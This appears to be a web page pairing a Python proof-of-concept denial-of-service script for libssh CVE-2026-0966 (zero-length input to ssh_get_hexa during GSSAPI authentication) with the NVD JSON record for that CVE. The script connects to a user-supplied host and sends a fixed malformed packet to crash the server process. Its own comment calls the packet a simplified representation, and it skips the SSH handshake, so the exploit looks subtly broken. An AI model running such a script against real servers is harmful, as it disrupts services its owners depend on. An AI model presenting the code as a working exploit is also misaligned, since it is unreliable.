CVE-2026-0966

#!/usr/bin/env python3 # PoC for CVE-2026-0966 (libssh DoS via ssh_get_hexa) # This script attempts to trigger the vulnerability by interacting with a target. # Note: Target server must have GSSAPI enabled and log level >= 3. import socket import sys def send_poc(target_ip, target_port): try: print(f"[*] Connecting to {target_ip}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_ip, target_port)) # Receive Banner banner = s.recv(1024) print(f"[+] Banner: {banner.decode().strip()}") # Send malformed GSSAPI packet to trigger ssh_get_hexa with zero-length # This is a simplified representation of the packet structure payload = b"\x00\x00\x00\x14\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" print("[*] Sending malformed payload...") s.send(payload) # Wait for response or timeout (indicating potential crash) response = s.recv(1024) print(f"[+] Response received: {response}") s.close() except Exception as e: print(f"[!] Connection failed or server crashed: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python3 cve_2026_0966_poc.py <IP> <PORT>") sys.exit(1) send_poc(sys.argv[1], int(sys.argv[2]))

{"cve": {"id": "CVE-2026-0966", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:00.783", "lastModified": "2026-05-19T14:16:36.260", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libssh. The API function `ssh_get_hexa()` is vulnerable to a denial of service when processing zero-length input. This can be exploited remotely by an attacker during GSSAPI (Generic Security Service Application Program Interface) authentication if the server's logging verbosity is set to `SSH_LOG_PACKET (3)` or higher. Successful exploitation could lead to a self-Denial of Service of the per-connection daemon process."}, {"lang": "es", "value": "La función API 'ssh_get_hexa()' es vulnerable cuando se proporciona una entrada de longitud 0 a esta función. Esta función se utiliza internamente en 'ssh_get_fingerprint_hash()' y 'ssh_print_hexa()' (obsoleta), la cual es vulnerable a la misma entrada (la longitud es proporcionada por la aplicación que realiza la llamada).\n\nLa función también se utiliza internamente en el código gssapi para registrar los OID recibidos por el servidor durante la autenticación GSSAPI. Esto podría activarse de forma remota cuando el servidor permite la autenticación GSSAPI y la verbosidad del registro se establece al menos en SSH_LOG_PACKET (3). Esto podría causar un auto-DoS del proceso demonio por conexión."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-124"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:libssh:libssh:*:*:*:*:*:*:*:*", "versionEndExcluding": "0.11.4", "matchCriteriaId": "68C64024-6979-46E1-A57F-5C0228DC8DAD"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:hardened_images:-:*:*:*:*:*:*:*", "matchCriteriaId": "87DEB507-5B64-47D7-9A50-3B87FD1E571F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:redhat:openshift_container_platform:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "932D137F-528B-4526-9A89-CD59FA1AB0FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "7F6FB57C-2BC7-487C-96DD-132683AEB35D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:redhat:enterprise_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "D65C2163-CFC2-4ABB-8F4E-CB09CEBD006C"}]}]}], "references": [{"url": "https://access.redhat.com/errata/RHSA-2026:18160", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:18683", "source": "[email protected]"}, {"url": "https://access.redhat.com/errata/RHSA-2026:7067", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://access.redhat.com/security/cve/CVE-2026-0966", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2433121", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/", "source": "[email protected]", "tags": ["Release Notes"]}]}}